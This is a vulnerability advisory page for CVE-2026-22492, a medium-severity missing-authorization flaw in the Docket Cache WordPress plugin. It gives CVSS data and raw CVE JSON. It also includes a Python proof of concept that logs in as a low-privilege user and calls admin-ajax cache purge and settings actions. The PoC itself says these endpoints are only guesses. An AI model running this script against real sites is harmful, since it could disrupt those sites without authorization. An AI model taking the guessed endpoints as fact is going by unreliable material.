Security Vulnerability Report
中文
CVE-2026-22492 CVSS 4.3 MEDIUM

CVE-2026-22492

Published: 2026-01-08 17:15:52
Last Modified: 2026-04-23 15:36:35

Description

Missing Authorization vulnerability in Nawawi Jamili Docket Cache docket-cache allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Docket Cache: from n/a through <= 24.07.04.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Docket Cache <= 24.07.04

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-22492 PoC - Docket Cache Missing Authorization # Target: WordPress site with Docket Cache plugin <= 24.07.04 target_url = "http://target-wordpress-site.com" # Step 1: Authenticate with low-privilege account login_url = f"{target_url}/wp-login.php" session = requests.Session() login_data = { "log": "low_privilege_user", "pwd": "password123", "wp-submit": "Log In" } session.post(login_url, data=login_data) # Step 2: Exploit the missing authorization vulnerability # Try to access admin-only Docket Cache functionality docket_cache_endpoints = [ f"{target_url}/wp-admin/admin-ajax.php?action=docket_cache_purge", f"{target_url}/wp-admin/admin-ajax.php?action=docket_cache_clear_all", f"{target_url}/wp-admin/admin-ajax.php?action=docket_cache_settings_save" ] for endpoint in docket_cache_endpoints: response = session.get(endpoint) # Check if the request was successful (status 200) if response.status_code == 200: print(f"[!] Potential unauthorized access to: {endpoint}") print(f"Response: {response.text[:200]}") # Note: This is a conceptual PoC. Actual exploitation requires # identifying the specific vulnerable endpoint in Docket Cache.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22492", "sourceIdentifier": "[email protected]", "published": "2026-01-08T17:15:51.520", "lastModified": "2026-04-23T15:36:34.830", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Nawawi Jamili Docket Cache docket-cache allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Docket Cache: from n/a through <= 24.07.04."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Nawawi Jamili Docket Cache permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Docket Cache: desde n/a hasta 24.07.04."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/docket-cache/vulnerability/wordpress-docket-cache-plugin-24-07-04-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}